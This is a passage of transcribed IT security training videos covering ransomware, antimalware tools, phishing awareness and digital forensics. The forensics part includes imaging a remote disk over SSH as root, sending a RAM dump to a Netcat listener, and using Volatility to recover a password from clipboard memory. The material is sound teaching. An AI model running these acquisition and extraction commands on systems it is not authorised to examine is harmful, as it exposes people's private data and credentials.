general consideration. Encryption mechanisms for ransomware might be through a Microsoft Word macro
virus that executes PowerShell commands. So we should always run up-to-date antimalware software. And, of course, user awareness matters. Users need to be aware of how these infections actually occur, because it only takes a single user clicking on one link, or opening one file attachment, to bring down the entire network. So users must understand that they should never open unexpected file attachments or click links sent via e-mail. If they don't know what to do, they should open a help desk ticket, and then we can escalate it further. The other thing is to make sure that we have frequent and working backups, because if by chance we do get hit with some form of ransomware, we need an alternative way to get our data back, and hopefully that backed-up data is recent and usable. A minimal backup sketch follows this topic.
In this video, we discussed ransomware.
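Since frequent and working backups are the main fallback against ransomware, here is a minimal backup sketch for a Linux host, assuming a hypothetical data folder of /home/data and a backup mount point of /mnt/backup; a real deployment would also keep offline or versioned copies so the backup itself can't be encrypted by the same infection.

# Mirror the data folder to the backup target, preserving permissions and timestamps
rsync -a --delete /home/data/ /mnt/backup/data/
# Also keep a dated archive so an already-encrypted file can't silently replace the only good copy
tar -czf /mnt/backup/data-$(date +%F).tar.gz -C /home data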
[Topic title: Antimalware. The presenter is Dan Lachance.] In this video I'll demonstrate how to work with
antimalware. Antimalware is software that will try to detect, catch, and maybe quarantine or remove malicious software, whether that be in the form of a worm, a Trojan, or a virus attached to a file, and so on. And it's critical
that we have antimalware software up to date on every device on the network including smartphones. Here in
Windows 10 I'm going to go ahead and launch the Windows Defender antimalware, although there are many
different vendors that offer solutions. [Dan launches Windows Defender from the desktop. The Windows
Defender window opens which displays three tabs named Home, Update, and History. The window includes
three scan options and a Scan now button.] Here I can see that real-time protection is turned on. [The Home
tab is selected by default and options such as real-time protection and Virus and spyware definitions are
displayed. There are two links for Settings and Help in the top right-hand side section of the window.] So that
means not only will it scan for malware on either a manual or a scheduled, triggered basis, but it's always
watching what is happening on the machine. Whether I'm opening email file attachments or opening files from
inserted USB thumb drives and so on. I can also see that the virus and spyware definitions are up to date on this machine. Down below, I can also see when the last scan was conducted. Here it says September 14th, 2016
and it was just a quick scan. Over on the right, I can manually trigger a quick, full, or customized scan on
demand.
So for example, if I were to choose Custom, and choose Scan now, I can then choose which drives and folders
that I want to scan. [The Windows Defender dialog box opens which displays the drives and folders which can
be selected for scanning. The window includes two buttons named OK and Cancel.] However, I'm going to
cancel that. Under the Update tab, [Dan clicks the Update tab which includes the update definitions
button.] we can see here our virus and spyware definition database is up to date. And we can see the date and
time at which that applies. We can also see the specific version of our virus and spyware definitions, which can
be important when troubleshooting. Now we also have a button here where we can manually click on Update
definitions. Under the History tab, [He clicks the History tab, which includes the View details button.] we'll have a
history of any quarantined, allowed, or detected items. Here I'm going to choose All detected items and I'll
click the View details button. Here we can see at one point it detected a Trojan on this machine. The alert level
was severe. This is the date on which it was detected and then, of course, it was quarantined. [The History tab
now displays the Remove all button.] Now at this point, I do have the option, of course, of removing that
Trojan from this host. In this particular software, Windows Defender, we can also click on the Settings link in
the upper right. And when I do that, [The Update & Security settings window opens. The window is divided
into two sections. The first section displays many tabs such as Windows Update, Windows Defender, and
Backup. The second section displays information related to the selection made in the first section. The
Windows Defender tab is selected by default and the second section displays many sections such as Real-time
protection, Cloud-based protection, Exclusions, Version info, and Automatic sample submission.] it spawns
the Update and Security settings here in Windows 10, where Real-time protection can be turned on or off,
where Cloud-based protection can be turned on or off. So the Cloud-based protection will send information
about detected malware on our computer to Microsoft. We also have the option, if we scroll further down, as we do in every antimalware type of solution, to exclude certain types of files or folders that we know will trigger a false positive.
So I could exclude a file or a folder. [The ADD AN EXCLUSION window opens which displays sections such
as Files and folders, File types, and Processes.] Here I've got a folder I've excluded where I've got some live
hacks stored for testing purposes. We can also exclude certain file types or individual processes. Larger
networks will work with antimalware from a centralized tool. [He switches to the System Center Configuration
Manager window. The window displays many buttons such as All Objects, Saved Searches, and Close. Below
these buttons, the window is divided into two sections. The first section displays the Assets and Compliance
subsection along with tabs for Assets and Compliance, Software Library, Monitoring, and Administration. The
Assets and Compliance tab is selected by default. The second section displays information related to the
selection made in the first section. The Assets and Compliance subsection displays the Overview node which
includes many subnodes such as Device Collections, Asset Intelligence, Compliance Settings, Endpoint
Protection, and All Corporate-owned Devices.] In this case, we're looking at System Center Configuration
Manager 2012, where we've already gone to the Assets and Compliance workspace in the bottom left. In the left-hand navigator, I'm going to expand Endpoint Protection. System Center Endpoint Protection, often referred to as SCEP, is the antimalware solution included with SCCM, although it must be licensed separately.
So notice here on the left we can click on Antimalware policies. [The Endpoint protection subnode includes
subnodes such as Antimalware Policies and Windows Firewall policies.] And on the right, any antimalware
policies that were created, of course there's a default one, will be listed. So for instance, I'm going to go ahead
and double-click on the Default Client Antimalware Policy to open up its settings. [The Default Antimalware
Policy window opens. The window is divided into two sections. The first section includes many tabs such as
Definition updates, Advanced, Exclusion settings, Real-time protection, Default actions, and Scan settings.
The Scheduled scans tab is selected by default.] Where on the left, if I click Scan settings, on the right I see
Scan settings, such as whether we should be scanning email and attachments or removable devices like USB
drives. Or should we scan network drives when conducting a full scan? Should we scan archived files, and so
on. Now also, we can click Real-time protection over on the left to determine whether real-time scanning is
turned on and exactly how that is configured.
We have Exclusion settings. Under Advanced over here, we can determine whether a System Restore point should be taken on clients before the machine is cleaned, and so on. So finally, the last thing we'll talk about
with this solution is the Definition updates over here on the left. Where we can determine exactly, [He clicks
the Definition updates tab and the second section displays buttons such as Set Source, Set Paths, OK, and
Cancel.] by clicking the Set Source button, where the updates come from [The Configure Definition Update
Sources window opens. It displays many definition update sources to be contacted.] and how often they are
applied. So really, we're doing the same kind of thing that we could do on a single station. The difference
being that we're doing it centrally and it could potentially apply to thousands of computers. Because here in
SCCM, [He exits the Default Antimalware Policy window. The System Center Configuration Manager window
displays two Antimalware Policies, Default Client Antimalware policy and Toronto Antimalware Settings for
Endpoint.] when I right-click on a policy, now the default client policy doesn't give me the option to deploy it
to a specific collection. But if I've built a custom policy I can determine, [He right-clicks the custom policy
and from the shortcut menu, chooses Deploy.] by choosing Deploy, exactly which collections that these
antimalware settings will apply to. [The Select Collection dialog box opens.] The default settings apply to all
devices managed by this SCCM site. So there are enterprise-class tools to essentially work with things like
antimalware. And of course, if I go to the Monitoring workspace over here on the left, [He clicks the
Monitoring tab.] and if I expand, Reporting and Reports in the left-hand navigator, I'll see that I have some
report categories. [The Reports subnode displays many subnodes.] Some of which are related to working with
things like malware. So for example, if I were to click on Reports and then click the Search bar at the top and
then simply type in malware to search for reports that have that term in it. We can see we've got a number of
antimalware reports that we can run.
Now what about zero day exploits? [The Enhanced Mitigation Experience Toolkit window is open. The
window includes buttons named Wizard, Apps, and Trust.] Those that aren't yet known to the system owner or
vendors of hardware and software but, of course, are known to malicious users. Well, there are different tools
we can use to mitigate those types of problems. Here I have installed and launched the Enhanced Mitigation
Experience Toolkit, or EMET. This is a free Microsoft tool. Let's go ahead and expand it and work with it a
little bit. The overall purpose of this tool is to prevent vulnerabilities in our software configurations, whether
it's operating system or apps, from being exploited. Even though there might not be a specific exploit signature
for this type of activity. Here in the bottom pane of EMET, we can see the list of running processes on this host and whether or not they are running with EMET mitigations. We can see that none of them are. So what we're going to do then is click the Apps button up in the toolbar where we can add an
application that we want EMET to monitor. [He clicks the Apps button and the Application Configuration
window opens.] We can see some standard apps here like iexplore.exe for Internet Explorer, WordPad,
Outlook, Word, Excel, PowerPoint, Access, Publisher, and so on. What I'm going to do is click the Add
Application button way up at the top. And we're going to go here into drive C on this machine.
We're going to go to Program Files. And we're going to scroll down and go into 7-Zip where we're going to
choose the 7z.exe program to make sure that we monitor it for any kind of vulnerability exploits. 7-Zip is a
compression tool. I'm going to go ahead and click Open. And we can see that 7-Zip has been added and most
of the check marks for these mitigations are enabled. For example, ASR stands for Attack Surface Reduction. ASR is primarily concerned with things like browser plugins, such as Java plugins, PDF reader plugins, or Flash plugins. EAF over here on the left stands for Export Address Table Access Filtering. What
this allows EMET to do is to capture any Windows API calls that are triggered from potentially harmful or
suspicious locations, such as an ActiveScript running on a web page. So besides just antimalware we can also
use tools such as Microsoft Enhanced Mitigation Experience Toolkit to prevent bad things from happening on
a device.
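As a rough command-line counterpart to the GUI tools shown above, here is a minimal sketch using the free ClamAV scanner on a Linux host; the folder paths and the excluded lab folder are placeholders, and an enterprise rollout would still want the centralized policy and reporting discussed earlier.

# Update the virus definition database, similar in spirit to Defender's definition updates
sudo freshclam
# Recursively scan a folder, print only infected files, and move them to a quarantine folder
sudo mkdir -p /var/quarantine
sudo clamscan -r --infected --move=/var/quarantine /home
# Exclude a folder known to trigger false positives, similar to the GUI exclusion settings
sudo clamscan -r --infected --exclude-dir='^/home/labs/hacktools' /home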
7. Video: User Training and Awareness (it_cscybs_11_enus_07)
After completing this video, you will be able to explain why user training and awareness is one of the most
important security defenses.
Objectives
explain why user training and awareness is one of the most important security defenses
[Topic title: User Training and Awareness. The presenter is Dan Lachance.] Many network infections still
occur from inside the network and not necessarily due to malicious users, but rather a lack of user awareness.
In this video, we'll talk about user training and awareness, which really turns out to be the single most effective
defense against threats. During user onboarding when we are hiring new employees, whether they be IT
technicians or not, it doesn't matter, everyone needs to be involved. User onboarding needs to include security
documentation for new employees, as well as training about security threats. We might also conduct ongoing
lunch and learn sessions for existing employees since the threat landscape is ever changing. We might also
have colorful and interesting and fun IT security posters in the office to increase general awareness about
security threats. We might also include some kind of a security tips and hints web site. Also, monthly company
newsletters are often done in larger organizations. They have news about the organization, maybe employee
birthday announcements. But they should also include some information about security awareness. So ongoing
IT security awareness and training is absolutely paramount. Now what should users do about this? Well,
through their awareness training, they should be made aware of social engineering. Essentially, it might be cynical, but users must adopt the mindset that everybody is trying to trick them. Because in this day and
age of digital communications, it's quite easy to receive an SMS text message on your phone that you didn't
ask for or the same thing is true of receiving an email message in your inbox that you didn't ask for.
So therefore users need to be vigilant about suspicious people, physically, that they might notice on a property
or in the building, but also suspicious about computer activity. So therefore, part of user training and
awareness needs to include who should be notified when suspicious people or computer activity is noticed.
Users must also be trained to pay attention to free software installation options, where additional software
might be installed, including spyware. Now in some cases, many corporate enterprises will prevent the
installation of user software, unless performed by an IT technician. Then there's also telling others about IT security to spread the word about what to watch out for. Pictured on the screen, we can see a screenshot of somebody downloading a file attachment, which apparently comes from Western Union for a money transfer. But we can see the antivirus message about this being a Trojan. [He switches to the MS Outlook window where an inbox is displayed.] Consider on the screen this email message that appears to be from the Bank of Montreal, or BMO, which tells me in the subject line that login has been disabled, along with the date and time. Now if I click to open up that email message, I can see the detail of that message. Take a look at the email address up at the top, utah.edu. That doesn't look like it's coming from the Bank of
Montreal Internet domain name. Here it tells me that my online web portal login has been temporarily disabled
due to too many unsuccessful login attempts.
So my bank account is locked and so are all of my funds, and I've got a nice convenient link here I can click to
reset my password so I can continue with online banking with Bank of Montreal. Of course, the strange thing
is, I am not a Bank of Montreal member and even if I was, banks and law enforcement agencies and
government agencies will never contact you in this way asking you to click a link. It just doesn't happen, the
problem is a lot of people don't know this. So what should users watch out for? Users should not download
BitTorrent files or hastily install free software without reading the terms of agreement or installing additional
plug-ins. Users should never visit illegal web sites of any kind. They should never open unexpected email file
attachments or click links in email messages, especially if it's not something that they asked for. Now, in some
cases when you try to login to a web site, if you forget your password, you'll click the Forgot Password link.
And it will send an email message to reset the account to your email address. In that case, you triggered it, but
if you get email messages about resetting passwords that you didn't ask for, it's a scam.
So users must never be fooled by this and if they're not sure, they need to contact the help desk to find out if
it's legitimate or not. Other security awareness topics for users include physical security, such as making sure
they don't leave sensitive documents on the top of their desks. Making sure that they use lockdown cables for
laptop computers and that they don't leave USB thumb drives or smartphones in airports or forget them on
coffee tables at coffee shops. So there should be a clean desk policy and good password security, and the shared use of work devices should always be discouraged. Wireless network security must be made known to users in the sense that it's very easy for a malicious user to create a rogue access point that looks like a legitimate wireless access point. Once the
user associates with that access point, the attacker potentially could see sensitive information that the user is
sending through that wireless access point. We now know of the danger of phishing email messages because
we've looked at a few examples here. And, of course, we know about malware and how it can be delivered and
once a machine is infected what it might do, such as spying on your computing habits or encrypting files that
you have write access to. In this video, we talked about user training and awareness.
After completing this video, you will be able to describe digital forensics.
Objectives
[Topic title: Digital Forensics Overview. The presenter is Dan Lachance.] In this video, we'll have a chat
about digital forensics. Digital forensics is the collection and investigation of digital data. The term triage
relates to this in that it allows for the prioritization of forensic tasks. Whether we are going to a suspect's
premises to seize equipment, or data on the equipment, or even trying to seize data stored in the cloud. The
integrity of evidence needs to be maintained. We must follow the chain of custody so that we can always track
who had access to collected evidence and where and how it was stored. Hashing allows us to get a unique
value for data that can be used in the future to detect changes. So therefore, we can verify a hash prior to
analysis of seized data to ensure that it matches the acquisition hash, so we know that nothing's been changed.
We can also use tamper-proof seals for physical evidence to ensure that data and equipment are kept safe. All activities need to be documented when gathering and then storing evidence. Data sources for digital forensics include network transmissions, log files, data files, and even the swap files that are used for temporary storage of memory pages, as well as active memory (RAM) pages, which could include information related to active network connections or processes running at a specific point in time, which could be crucial in getting some kind of conviction in a court of law.
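To make the acquisition hash idea concrete, here is a minimal sketch using standard Linux tools; disk1.img is a hypothetical image file name.

# Record a hash at acquisition time and store it with the case documentation
sha256sum disk1.img > disk1.img.sha256
# Later, before analysis, verify that the evidence still matches the acquisition hash
sha256sum -c disk1.img.sha256    # prints "disk1.img: OK" if nothing has changed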
Naturally, if we are going to use these data sources they have to be trustworthy as do the date and timestamps
associated with them. Other data sources include disk partition tables, the contents of boot sectors, file
allocation tables, which are used for every file system on a disk partition. Things like cloud backups might be
used. So if we seize a suspect's mobile phone, for example, there might not be anything incriminating on it, but
if we track its access to cloud services, there might be something that was backed up to the cloud that could be
of value. And in some cases, cloud backups are automated, which might even be unknown to a suspect. Then
of course, digital forensic tools can gather data from removable media, which includes USB thumb drives, external hard disks, and so on. Forensic analysis then analyzes the data after we've got an acquisition hash.
Now, the term big data is being thrown around a lot these days, and it refers to the large volumes of data that
must be processed to look for something meaningful. And that certainly applies to forensic analysis because
depending on how much data is gathered, there is a specific amount of time that's required to parse and
produce results from those large data sets. So often what gets used in forensic analysis is some kind of clustering solution, such as BinaryPig on Hadoop clusters, where we've got multiple computers working together to process data.
And this is also easily deployed in the cloud where we can very quickly spin up clusters for big data forensic
analysis, and once it's finished, we can then deprovision it so we're no longer paying for the use of that
clustering service. For example, consider the services that are available to users who have Amazon Web Services accounts. [He switches to the Amazon Web Services web page. The page is divided
into two sections. The first section displays many subsections such as Compute, Developer tools, Analytics,
and Internet of things. The second section displays subsections such as Resource Groups and Additional
Resources.] If I scroll down on the main page under Analytics, I can click on EMR, which is Elastic MapReduce, a managed Hadoop framework to basically run large-scale analytics on large data sets [He
clicks the EMR icon.] . So from here I can click on the Create cluster button to begin defining my
configuration to process large volumes of data, [The page displays information on the Amazon Elastic
MapReduce.] which could be very useful for forensic analysis. In this video, we discussed digital forensics.
During this video, you will learn how to determine which forensic hardware is best suited for a specific
situation.
Objectives
In this video, you will learn how to determine which forensic software is best suited for a specific situation.
Objectives
[Topic title: Digital Forensics Software. The presenter is Dan Lachance.] Just like a carpenter requires a
toolbox with the correct tools to ply their trade, the same thing is true of a digital forensics analyst. They need
the correct hardware and software. In this video, we're going to talk about digital forensics software. So besides having the correct hardware for disk imaging, or even things like crime tape to seal off a scene, at the software level there are some commonalities within digital forensics software. Most of them will support write blocking to prevent any changes being made to the originating data, and this is often paired with file and metadata hashing. A hash is a unique value based on the state of data, in this case, when it was acquired. And we want to
do that before we perform any kind of data analytics on acquired evidence. So, commonalities of digital
forensics software also include the preservation of original evidence, safekeeping and tracking, and correct date and timestamps. Often this will be conducted from a digital forensic workstation, which might also perform OS and process analysis, looking for anomalies or looking to date and timestamp the state of an operating system and its running processes at the time of evidence acquisition. There's also, in the same way, file
system and RAM analysis at the time of evidence acquisition. Some digital forensics software that can be used
is built in to operating systems like the standard UNIX and Linux dd, or disk dump command. This can also be
used locally, as well as remotely over the network, where we can capture slack and unallocated space on a
disk, not just capturing what's in use. This way we can track things that were removed in the past.
We can also send captured data using disk dump to a specific TCP or UDP port. Pictured in our example, [Dan refers to the following code: ssh root@<ip address> dd if=/dev/sda of=/acquired/disk1.img. Code ends.] we can see a forensic analyst executing the ssh command to connect as root over the network to a device with a specific IP address and then remotely running the dd command. The dd command specifies an input file, in this case /dev/sda, the entire disk, and the of parameter specifies the output file, where we're storing data in an image file called disk1.img in an /acquired folder. Now you must be careful when gathering evidence as to where you store this. Here it's being stored on the remote machine that we're SSHing into; a hedged variant that writes the image to the analyst's workstation instead is sketched at the end of this topic. Also, any forensic analysis that captures the state of network connections and so on must
account for the fact that we are connecting over the network to gather this evidence. The forensic toolkit is
often called FTK. This is a widely used toolkit that includes many different forensic analysis tools such as
those related to disk scanning, deleted file recovery. It supports disk imaging and hashing. It also supports
distributed processing for processing big datasets when we're conducting forensic analysis. This can be used to
reduce case processing time. EnCase is another popular digital forensics tool suite; it supports automation by exposing APIs.
It supports eDiscovery, or electronic discovery, of evidence and also forensic data recovery and analysis. The
BlackBag MacQuisition tool is for Macintosh forensic imaging and analysis for MacBook Pros and MacBooks
and MacBook Air devices. However, it's not designed to acquire data from iPhones or iPads. The X1 Social
Discovery tool is also another eDiscovery tool focused on social media content. As related to sites like
Facebook, Twitter, and LinkedIn to name just a few, as well as visited websites and YouTube activity. Other
common forensic software titles include various password crackers, such as Cain and Abel, or the Helix tool,
the Sysinternals Suite, and Cellebrite. In this video, we talked about digital forensics software.
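As promised earlier, here is a hedged variant of the dd-over-SSH example in which the image is written to the analyst's workstation instead of the suspect machine, and hashed right away; the IP address and paths are placeholders.

# Run dd on the remote host but redirect its output over SSH to the local forensic workstation
ssh root@192.0.2.10 "dd if=/dev/sda bs=4M" > /evidence/disk1.img
# Record an acquisition hash immediately so any later change can be detected
sha256sum /evidence/disk1.img > /evidence/disk1.img.sha256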
After completing this video, you will be able to explain how forensic tools can be used against data stored on
media.
Objectives
explain how forensic tools can be used against data stored on media
[Topic title: Digital Forensics and Data at Rest. The presenter is Dan Lachance.] In this video, I'll talk about
digital forensics and data at rest. Data at rest is data that is stored on some kind of storage media. Often, when
we conduct forensic analysis and evidence gathering, we must use specifically approved tools. For example,
we might have to use Encase or the Forensic Toolkit imager tool. What we must do when we gather data at rest
for evidence is encrypt forensic images for safekeeping. We must also follow the chain of custody, meaning that all activity related to gathered evidence, where it's stored, how it's stored, and who had access to it, must be logged diligently. Otherwise, the data might be deemed inadmissible in a court of law. Forensic images can then be mounted for analysis purposes. Now, the options and visibility of the data when that
forensic image is mounted, really depends on the tool that's being used to mount the forensic image. A forensic
clone is a duplicate of a disk, whereas a forensic image is a file that contains a duplicate of the data from a
source disk. Now, forensic images are much more common than forensic clones.
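As a minimal sketch of mounting an image for analysis on Linux without risking changes to it, assuming a raw image file named disk1.img that contains a single file system:

sudo mkdir -p /mnt/evidence
# ro = read-only, loop = mount a file as a device, noexec = never execute anything from the image
sudo mount -o ro,loop,noexec disk1.img /mnt/evidence
ls -l /mnt/evidence
# Detach the image when analysis is finished
sudo umount /mnt/evidence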
The EnCase file format, for example, is very common; it uses the E01 evidence file image format.
Forensic disk images can be taken of the traditional hard disk drives, or HDDs, which are the traditional
magnetic hard disks with spinning platters, or the newer SSDs, or solid state drives. Forensic disk images are a
bit-level copy of a disk partition that reflects the file system at a specific point in time. It also includes slack and unallocated space on the disk, which can be useful to see deleted file remnants. Timestamps are crucial and must come from a trusted time source. It's also important that file hashes are taken of acquired data before we actually analyze the data and potentially make changes, despite the fact that we might
be using hardware or software write-blockers. With digital forensics and data at rest analysis, live imaging
means that the system is not powered down when we are acquiring disk images. Now, this is crucial if disk
encryption is in use on a suspect's machine and we don't have the decryption key.
Many disk encryption solutions protect data at rest when the system is powered down or if someone physically
steals the disk. But when the operating system is up and running, often, the disk volume contents are decrypted
and are therefore usable as usual. Dead imaging refers to the acquisition or analysis of disk data when the
system is powered down. So, often, the disk is removed and disconnected from that station and instead
connected to a forensic station. Now, hardware and software write-blockers can prevent data alterations when
we make a copy of that data. In this video, we discussed digital forensics and data at rest.
[Topic title: Common Digital Forensic Tools. The presenter is Dan Lachance.] In this video, I'll talk about
common digital forensic tools. So, why are there specific forensic tools? Well, first of all, they're often used for evidence gathering, whether it's hardware or software. At the same time, we need to adhere to the chain of custody, where access to acquired evidence, and how data is acquired for evidence, is documented along every step. There's also the trustworthiness of gathered data, making sure that we know we have the original data and can track whether or not it's been modified, and also having a trustworthy date and timestamp
source. There are open and closed source tools that can be used for digital forensic analysis. Forensic tool
categories begin with image capturing. Tools that do this work with things like storage media, whether it's an
external USB drive, an internal disc array, or an SD card and so on, where often, they are hashed. Now, by
hashing an entire file system, we are generating unique values for everything on that file system, all the files,
so that if there are any changes made in the future, we can detect that changes were made. There are also ways
to capture volatile memory or RAM contents, physical memory. So we can acquire that locally. For instance,
by running a tool on a machine that's on, acquiring a memory dump and perhaps storing it on removable
media. Or, the memory dump data could be sent over the network to another host.
There are also email forensic tools. Part of what they will do is take a look at SMTP headers. SMTP headers
are essentially metadata about the email message, including the path that was used to send it. And sometimes,
different mail systems will form SMTP headers in different ways. And we might even check to see how the
fields in the SMTP header are constructed to determine if the SMTP message was in fact forged. There are also ways and tools to take a look at encrypted and digitally signed messages and to take a look at the safekeeping of
private keys. Private keys are used to actually create a digital signature, which is used to verify the authenticity
of a message. And private keys are also used to decrypt messages encrypted to an individual. Other forensic
tool categories relate to the database level, where we can dig down into the database and its tables and look at
the data itself and also the metadata. We can also determine if row updates occurred and who did them. And
we can also analyze specific transactions used by a back-end database system. Network forensic tools are
designed to capture network traffic, but their placement on the network can be important so that they're
capturing the appropriate traffic.
For example, in a standard Ethernet switched environment, when we're plugged into one port in the switch, we
only see the traffic sent to that port from other devices on the network. Of course, that's besides multicasts and
broadcasts. We also have to bear in mind the ease with which packets can be spoofed using freely available
tools when we are capturing traffic for forensic analysis. Other forensics tools categories can include mobile
devices. Where we've got tools that can actually take a copy and hash of SIM card contents. Most mobile
devices these days also have some form of cloud backup. So, often, a digital forensics investigator will have to
take a look at any cloud account information that was synchronized from that mobile device up into the cloud.
A Faraday bag, or cage, is used to make sure that no signals can be transmitted or received by a wireless device. Finally, we might even take a look at the carrier itself, for example, a telecom
carrier, and ask for their logs related to activity on a given smartphone. There are built-in operating system
tools that we can use for things like forensic analysis. So think, for example, of the Unix and Linux dd or disk
dump command, which can actually be used to take a copy of an entire disk or partition. There's also the built-in Unix or Linux md5sum command, which may vary from one distribution to another, and allows us to take a file hash. On the Windows side, we can use the Get-FileHash PowerShell cmdlet to take a hash of a file. Then of course, there are numerous external tools that can be used by forensic analysts, including EnCase,
the forensic toolkit or FTK, and Helix. In this video, we talked about common digital forensic tools.
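Tying the built-in commands just mentioned to concrete syntax, here is a minimal sketch; the device and file names are placeholders, and the Windows cmdlet is shown only as a comment since the rest of the sketch is a Linux shell session.

# Copy a single partition to an image file with dd
sudo dd if=/dev/sda1 of=/evidence/sda1.img bs=4M
# Take a file hash of the image with md5sum
md5sum /evidence/sda1.img > /evidence/sda1.img.md5
# On Windows, an equivalent hash could be taken with:  Get-FileHash C:\evidence\sda1.img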
After completing this video, you will be able to explain the sequence of steps that should be followed when
conducting mobile device forensics.
Objectives
explain the sequence of steps that should be followed when conducting mobile device forensics
[Topic title: Mobile Device Forensics. The presenter is Dan Lachance.] In this video, we'll have a chat about
mobile device forensics. When we have a locked phone that we need to gather evidence from, it can present a problem, because attempting to unlock the phone itself will change the device data. Web browser cookies are one example: on an iPhone, the Safari web browser stores cookies in /private/var/mobile/Library, and they can be viewed with a hex editor or using an iPhone extraction tool. There's also the call history on a mobile device. For example, iOS uses SQLite data stored in /private/var/Library/CallHistory to store call data. Now, interestingly, when
it comes to locked phones, it really depends how important it is to law enforcement to get into it. If you think
about the fact that the FBI in 2016 paid a company $1 million as a one-time fee to be able to break into the San
Bernardino shooter's iPhone. Other data sources for mobile device forensics include the memory on the phone as it's running, internal and removable storage media, network traffic into and out of the mobile device, logs for the mobile phone's operating system as well as for apps, SMS text messages, and SIM card contents, which could include phonebook entries as well as SMS messages. So we should be able to create an image of an
entire mobile device file system and generate hashes before we start analyzing that acquired data. Common
Android tools related to forensics include Logcat, ClockworkMod Recovery, Linux Memory Extractor, as well as the Android SDK (a hedged sketch of a few Android acquisition commands follows this topic). Now some tools may require rooting the device so that they have full access to the device. Common iOS tools for Apple mobile devices include iTunes Backup. So, just because we seized an
iPhone for example, and there's no relevant data that we can see on the device, perhaps that data existed in the
past and was backed up through iTunes Backup in the cloud. There's also other tools for iOS devices, like the
iPhone Analyzer, iPhone Explorer and various tools available with the Lantern Forensics suite. On the iOS
side, some tools might actually require jailbreaking the device so it has full access to the iOS device. In this
video, we chatted about mobile device forensics.
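As mentioned above, here is a minimal sketch of pulling a few common artifacts from an Android device using the Android SDK's adb tool; it assumes USB debugging is enabled, some paths require a rooted device, and the evidence folder name is just a placeholder.

mkdir -p evidence
# Confirm the device is visible to adb
adb devices
# Dump the device log (Logcat) once and exit
adb logcat -d > evidence/logcat.txt
# Copy shared storage contents to the examiner's workstation
adb pull /sdcard/ evidence/sdcard/
# Create an Android backup archive of app data (prompts on the device; deprecated on newer versions)
adb backup -all -f evidence/device_backup.ab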
[Topic title: Creating a Physical Memory Dump. The presenter is Dan Lachance.] During forensic evidence
gathering, it can sometimes be critical that we capture an image of what was happening in memory, electronic
memory or RAM at the time that evidence was seized. There are many ways we can do that and in this video,
we're going to learn how to create a physical memory dump. Now there are plenty of tools that will run on
Windows, Unix, and Linux. Some of the tools might run off a USB thumb drive that you plug into the machine
itself, whose memory you want to get a dump from. And then maybe you would store the memory dump on a
USB removable drive or send it over the network. [The root@kali window is open.] The way that we're going
to do it here is we're going to begin in Kali Linux using a Netcat listener, or nc as you can see with the
command. We're going to listen for connections over the network where we can receive a memory dump taken
of a machine elsewhere. So the command here in Kali Linux is nc, for Netcat, -l for listen, -vvv. Basically, the
more Vs you have, the more verbose the output is, believe it or not. -p for the listening port, which here is
going to be 8888. And then that's followed by the redirection symbol, the greater than sign. So that we're
redirecting whatever we receive through this port to a file on this Linux host called clientmemdump1.dd. Let's
go ahead and press Enter to start that listener on Kali Linux. And now it says listening on [any], which means
any interface on port 8888. So I'm looking at a Windows machine where Internet Explorer is connected to a
banking website. [The rbc.com web site is open in Internet Explorer.] What we want to do is get a memory
dump of this machine. So there are many ways to do that. What we are going to do is go to the Start menu and go to My Computer, where we've got a tool that was downloaded that can actually acquire a memory dump and send it somewhere, like over the network.
And that tool is called Helix. [Dan clicks the icon for the Helix tool.] If I go ahead and run the Helix tool it
gives me a warning [The wizard is open.] that says the fact that you're running this tool is modifying this
system. So when you're gathering evidence, that is important to note and it must be documented. I'll accept that
by clicking the Accept button. And I'm going to click the Camera icon on the left to acquire a live image. The
Source up here is PhysicalMemory, of which there is a little over 500 MB worth. I want to send it over to a
NetCat location. So I'm gonna put in the IP address of our Kali Linux host which is listening on port 8888.
And I'll click Acquire. So it asks me if this is okay, if I want to do this, and I'm going to click Yes. And now it says it's copying physical memory. [The command prompt window opens with the message Copying physical memory.] Of course it's copying it over the network to our Linux host. Back here in Kali Linux, we can see in
fact that we've got a connection from a host called 192.168.1.242. Well, that's actually not what it's called, but
that is its IP address. So now it's just a matter of waiting until we receive the entire memory dump before we
can analyze it using a different tool called Volatility. We can now see in Linux that it received a number of
bytes. And if we type ls, we'll see the existence of our clientmemdump1.dd file. So the next thing we'll do is
use a different tool, and that's going to be Volatility, to analyze that file.
So with Volatility, I'm going to use -f for file. I'll specify the file name. And the first thing we'll start off with is
asking it to give us just a little bit of image information about that memory dump image. Depending on the
amount of memory gathered, that might take just a few seconds or it might take a few minutes. Okay, so it
looks like, next to Suggested Profile(s), it's a Windows XP machine. And further down, the Number of
Processors is set to 1. And then we have image date and time stamp information listed down below. I'm going
to use the up-arrow key to bring up that Volatility command again. Except, instead of imageinfo as the last
parameter, this time we're going to use pslist to give us a list of running processes at the time that the memory
dump was acquired. And sometimes that can be absolutely crucial when it comes to evidence in a specific
case. So we have a list of the processes here, and of course we see the date and time stamps over on the far
right. Let's clear the screen and bring up that command again. And let's change the last parameter from pslist in
this case to connscan to show any active connections, again, at the time that the memory dump was acquired.
Here we can see we have numerous connections to something on port 80, [A list of connections is
displayed.] we can see IP addresses. Now of course, there are ways that we can conduct reverse lookups.
For instance, using nslookup, which I can do here in Linux. I can set type=ptr to do a reverse pointer lookup, and maybe I'll pop in the first IP address I see here. [He enters the IP address 23.34.200.121.] And then I get
answers back that are listed from that. I get a non-authoritative answer, which means it came from a different
DNS server. You can see that we've issued the volatility command against our dump file again. But we've used
as a last parameter clipboard to show us the contents of what was copied in memory. [A table with column
headers such as Session, WindowStation Format, Handle, Object, and Data is displayed.] And notice that
under the Data column on the right it looks like we've got some kind of variation of my dog has fleas, which
appears to be some kind of a password. So we can start gathering some very detailed information from what
was happening within a memory dump at the time that it was acquired. In this video, we learned how to create
a physical memory dump.
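To recap the workflow just demonstrated as plain commands, here is a hedged sketch; the file name and port come from the demo, while the Volatility profile string is an assumption and should be taken from the imageinfo output on your own dump.

# On the Kali Linux analysis host: listen on TCP port 8888 and save whatever arrives to a file
nc -l -vvv -p 8888 > clientmemdump1.dd
# (Helix on the Windows machine is then pointed at this host's IP address and port 8888)

# Analyze the received dump with Volatility
volatility -f clientmemdump1.dd imageinfo                          # identify the suggested OS profile
volatility -f clientmemdump1.dd --profile=WinXPSP2x86 pslist       # processes running at acquisition time
volatility -f clientmemdump1.dd --profile=WinXPSP2x86 connscan     # network connections at acquisition time
volatility -f clientmemdump1.dd --profile=WinXPSP2x86 clipboard    # clipboard contents

# Reverse-lookup an address seen in the connection list (the demo used nslookup's interactive set type=ptr)
nslookup 23.34.200.121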
[Topic title: Viewing Deleted Files on a Hard Disk. The presenter is Dan Lachance.] In this video I'll
